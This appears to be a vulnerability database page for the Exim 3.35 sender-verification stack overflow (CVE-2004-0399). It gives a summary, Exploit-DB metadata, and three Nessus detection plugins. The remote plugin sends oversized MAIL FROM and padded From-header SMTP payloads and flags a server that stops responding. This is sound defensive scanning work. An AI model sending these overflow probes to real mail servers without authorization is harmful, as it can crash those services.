Vulnerabilities > CVE-2004-0399 - Stack-based buffer overflow in University of Cambridge Exim 3.35 sender verification (sender_verify)
Attack vector: UNKNOWN
Attack complexity: UNKNOWN
Privileges required: UNKNOWN
Confidentiality impact: UNKNOWN
Integrity impact: UNKNOWN
Availability impact: UNKNOWN
(The fields above are unscored on this page. The Nessus plugins listed below carry a CVSS v2 base vector of AV:N/Au:N/C:P/I:P/A:P, with attack complexity rated Medium by plugin 12232 and Low by the DSA-501/502 plugins.)
Summary
Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification. The option is not part of the default configuration (the Debian advisories state a stock install is not exploitable); the flaw is fixed in Exim 3.36 and does not exist in the Exim 4 code base. The companion issue CVE-2004-0400 (headers_check_syntax) does affect Exim 4 and is fixed in 4.33.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 2 |
Exploit-Db
description | Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability. CVE-2004-0399. Remote exploit for linux platform |
id | EDB-ID:24093 |
last seen | 2016-02-02 |
modified | 2004-05-06 |
published | 2004-05-06 |
reporter | newroot |
source | https://www.exploit-db.com/download/24093/ |
title | Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability |
Nessus
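# NASL family: SMTP problems
# NASL id: EXIM_MULT_OVERFLOW.NASL  (Nessus plugin id 12232)
# title: Exim < 3.36 / 4.33 Multiple Remote Overflows
# published: 2004-05-06  modified: 2020-06-02  last seen: 2020-06-01
# source: https://www.tenable.com/plugins/nessus/12232
#
# (C) Tenable Network Security, Inc.
#
# Remote check for the two Exim stack overflows reported by Georgi Guninski:
#   CVE-2004-0399  sender verification (sender_verify) path, Exim < 3.36;
#                  does not exist in the Exim 4 code base.
#   CVE-2004-0400  header syntax checking (headers_check_syntax) path,
#                  Exim < 3.36 / 4.33.
# Both options are off by default, hence the "potential_vulnerability" flag
# and the requirement for paranoid reporting.
#
# Review changes against the shipped plugin:
#   - the solution text said "4.32 or later" while the banner regex and the
#     plugin title flag 4.32 as vulnerable; corrected to 4.33;
#   - the description/solution only named header syntax checking although
#     the first active probe exercises sender verification;
#   - the banner-only report text was built but never attached to the finding;
#   - non-safe checks #2 and #3 were byte-identical; the duplicate is replaced
#     by a single liveness re-probe that keeps the same detection.

include("compat.inc");

if (description)
{
  script_id(12232);
  script_version("1.23");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_cve_id("CVE-2004-0399", "CVE-2004-0400");
  script_xref(name:"Secunia", value:"11558");

  script_name(english:"Exim < 3.36 / 4.33 Multiple Remote Overflows");
  script_summary(english:"Exim Multiple Overflows");

  script_set_attribute(attribute:"synopsis", value:
"The remote SMTP server has multiple buffer overflow vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote version of Exim has multiple remote stack-based buffer
overflow vulnerabilities when header syntax checking
(headers_check_syntax, CVE-2004-0400) or sender verification
(sender_verify, CVE-2004-0399) is enabled.  It should be noted that
neither option is part of the default configuration.

A remote attacker could exploit this to execute arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/May/270");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Exim 3.36 / 4.33 or later, or disable header syntax
checking (headers_check_syntax) and sender verification (sender_verify)
in exim.conf.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"vuln_publication_date", value:"2004/05/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/05/06");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:exim:exim");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"SMTP problems");
  script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");

  script_dependencies("smtpserver_detect.nasl");   # should we use the result from smtpscan?
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/smtp", 25);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("smtp_func.inc");

# Run one pipelined SMTP transaction against port and classify the outcome.
#
#   1  greeting received, but no reply at all after the payload
#      (the daemon is assumed to have died on it)
#   0  the server replied
#  -1  no TCP connection could be made
#  -2  connected, but no SMTP greeting arrived
#
# Only the first reply line after the payload is read, exactly as in the
# shipped plugin.  NOTE(review): a server that answers HELO before dying on
# MAIL FROM or DATA would therefore look healthy here; a per-command read
# would be stricter but has not been validated against a live Exim.
function exim_probe(port, req)
{
  local_var soc, greeting, reply;

  soc = open_sock_tcp(port);
  if (!soc) return -1;

  greeting = smtp_recv_line(socket:soc);
  if (!greeting)
  {
    close(soc);
    return -2;
  }

  send(socket:soc, data:req);
  reply = recv_line(socket:soc, length:512);
  close(soc);

  if (!reply) return 1;
  return 0;
}

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_kb_item("Services/smtp");
if (!port) port = 25;
if (!get_port_state(port)) exit(0);

banner = get_smtp_banner(port:port);
if (!banner) exit(0);
if (!egrep(string:banner, pattern:"Exim")) exit(0);

if (safe_checks())
{
  # Banner-only test.  The alternation covers Exim 0.x-2.x, 3.00-3.35 and
  # 4.00-4.32, i.e. everything below the fixed 3.36 / 4.33.
  if (egrep(pattern:"220.*Exim ([0-2]\.|3\.([0-2][0-9]|3[0-5])|4\.([0-2][0-9]|3[0-2]))", string:banner))
  {
    report = string("\nNessus verified this solely by checking the banner.\n");
    security_warning(port:port, extra:report);
  }
  exit(0);
}

# Active checks.  Each payload is a full transaction ending in QUIT so that a
# healthy server always has something to say back.

# Probe 1 - a 300-character local part in MAIL FROM, which is what the
# sender verification code (sender_verify, CVE-2004-0399) has to parse.
sender_req  = string("HELO x.x.x.x\r\n");
sender_req += string("MAIL FROM: ", crap(300), "@nessus.org\r\n\r\n");
sender_req += string("RCPT TO: web@localhost\r\n");
sender_req += string("DATA\r\n");
sender_req += string("blahblah\r\n.\r\nQUIT\r\n");

# Probe 2 - a "From" header padded with 275 spaces before the colon, which
# is what the header syntax check (headers_check_syntax, CVE-2004-0400)
# has to parse.
# NOTE(review): "[email protected]" is how the sender address was captured on
# this page; the shipped plugin uses a concrete address there.
header_req  = string("HELO x.x.x.x\r\n");
header_req += string("MAIL FROM: [email protected]\r\n");
header_req += string("RCPT TO: web@localhost\r\n");
header_req += string("DATA\r\n");
header_req += string("From", crap(data:" ", length:275), ":nessus\r\n");
header_req += string("blahblah\r\n.\r\nQUIT\r\n");

# Before any payload has been sent, a connection or greeting failure just
# means the service is unreachable: no finding.
res = exim_probe(port:port, req:sender_req);
if (res < 0) exit(0);
if (res == 1)
{
  security_warning(port);
  exit(0);
}

# The server was reachable a moment ago, so a refused connection from here
# on is taken as the previous payload having killed the listener.  A missing
# greeting is still inconclusive and ends the check without a finding.
res = exim_probe(port:port, req:header_req);
if (res == -2) exit(0);
if (res != 0)
{
  security_warning(port);
  exit(0);
}

# Final liveness re-probe (stands in for the shipped plugin's duplicated
# check #3): if the header payload took the daemon down after it had
# already replied, the reconnect fails here.
soc = open_sock_tcp(port);
if (!soc)
{
  security_warning(port);
  exit(0);
}
close(soc);
exit(0);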
#%NASL_MIN_LEVEL 80502
# NASL family: Debian Local Security Checks
# NASL id: DEBIAN_DSA-502.NASL  (Nessus plugin id 15339)
# title: Debian DSA-502-1 : exim-tls - buffer overflow
# published: 2004-09-29  modified: 2020-06-02  last seen: 2020-06-01
# source: https://www.tenable.com/plugins/nessus/15339
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-502. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
# Local (dpkg-based) check: reports a Debian 3.0 (woody) host whose exim-tls
# package is older than the DSA-502 fix, 3.35-3woody2.  The advisory text
# itself notes that the overflows are not reachable with Debian's default
# exim.conf, so a hit means "unpatched", not "exploitable as configured".

include("compat.inc");

if (description)
{
  script_id(15339);
  script_version("1.19");
  script_cvs_date("Date: 2019/08/02 13:32:18");

  script_cve_id("CVE-2004-0399", "CVE-2004-0400");
  script_bugtraq_id(10290, 10291);
  script_xref(name:"DSA", value:"502");

  script_name(english:"Debian DSA-502-1 : exim-tls - buffer overflow");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Georgi Guninski discovered two stack-based buffer overflows in exim and
exim-tls. They cannot be exploited with the default configuration from
the Debian system, though. The Common Vulnerabilities and Exposures
project identifies the following problems that are fixed with this
update :

  - CAN-2004-0399
    When 'sender_verify = true' is configured in exim.conf a
    buffer overflow can happen during verification of the
    sender. This problem is fixed in exim 4.

  - CAN-2004-0400
    When headers_check_syntax is configured in exim.conf a
    buffer overflow can happen during the header check. This
    problem does also exist in exim 4."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2004/dsa-502"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade the exim-tls package.

For the stable distribution (woody) these problems have been fixed in
version 3.35-3woody2."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:exim-tls");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/05/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}

include("audit.inc");
include("debian_package.inc");

# Every audit() call below terminates the plugin with the given reason.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Packages fixed by DSA-502 on woody, all at the same reference version.
fixed_version = "3.35-3woody2";
affected = 0;
foreach pkg (make_list("exim-tls"))
{
  if (deb_check(release:"3.0", prefix:pkg, reference:fixed_version)) affected++;
}

if (!affected) audit(AUDIT_HOST_NOT, "affected");

# deb_report_get() carries the installed-vs-fixed version text collected
# by deb_check(); it is only attached at higher verbosity.
if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
else security_hole(0);
exit(0);
#%NASL_MIN_LEVEL 80502
# NASL family: Debian Local Security Checks
# NASL id: DEBIAN_DSA-501.NASL  (Nessus plugin id 15338)
# title: Debian DSA-501-1 : exim - buffer overflow
# published: 2004-09-29  modified: 2020-06-02  last seen: 2020-06-01
# source: https://www.tenable.com/plugins/nessus/15338
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-501. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
# Local (dpkg-based) check: reports a Debian 3.0 (woody) host whose exim or
# eximon package is older than the DSA-501 fix, 3.35-1woody3.  The advisory
# text itself notes that the overflows are not reachable with Debian's
# default exim.conf, so a hit means "unpatched", not "exploitable as
# configured".

include("compat.inc");

if (description)
{
  script_id(15338);
  script_version("1.23");
  script_cvs_date("Date: 2019/08/02 13:32:18");

  script_cve_id("CVE-2004-0399", "CVE-2004-0400");
  script_bugtraq_id(10290, 10291);
  script_xref(name:"DSA", value:"501");

  script_name(english:"Debian DSA-501-1 : exim - buffer overflow");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Georgi Guninski discovered two stack-based buffer overflows. They can
not be exploited with the default configuration from the Debian system,
though. The Common Vulnerabilities and Exposures project identifies the
following problems that are fixed with this update :

  - CAN-2004-0399
    When 'sender_verify = true' is configured in exim.conf a
    buffer overflow can happen during verification of the
    sender. This problem is fixed in exim 4.

  - CAN-2004-0400
    When headers_check_syntax is configured in exim.conf a
    buffer overflow can happen during the header check. This
    problem does also exist in exim 4."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2004/dsa-501"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade the exim package.

For the stable distribution (woody) these problems have been fixed in
version 3.35-1woody3."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:exim");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
  script_set_attribute(attribute:"vuln_publication_date", value:"2004/05/06");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}

include("audit.inc");
include("debian_package.inc");

# Every audit() call below terminates the plugin with the given reason.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Packages fixed by DSA-501 on woody, all at the same reference version.
# The list order is kept (exim, then eximon) so the collected report text
# comes out in the same order as before.
fixed_version = "3.35-1woody3";
affected = 0;
foreach pkg (make_list("exim", "eximon"))
{
  if (deb_check(release:"3.0", prefix:pkg, reference:fixed_version)) affected++;
}

if (!affected) audit(AUDIT_HOST_NOT, "affected");

# deb_report_get() carries the installed-vs-fixed version text collected
# by deb_check(); it is only attached at higher verbosity.
if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
else security_hole(0);
exit(0);
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021015.html
- http://secunia.com/advisories/11558
- http://www.debian.org/security/2004/dsa-501
- http://www.debian.org/security/2004/dsa-502
- http://www.guninski.com/exim1.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/16079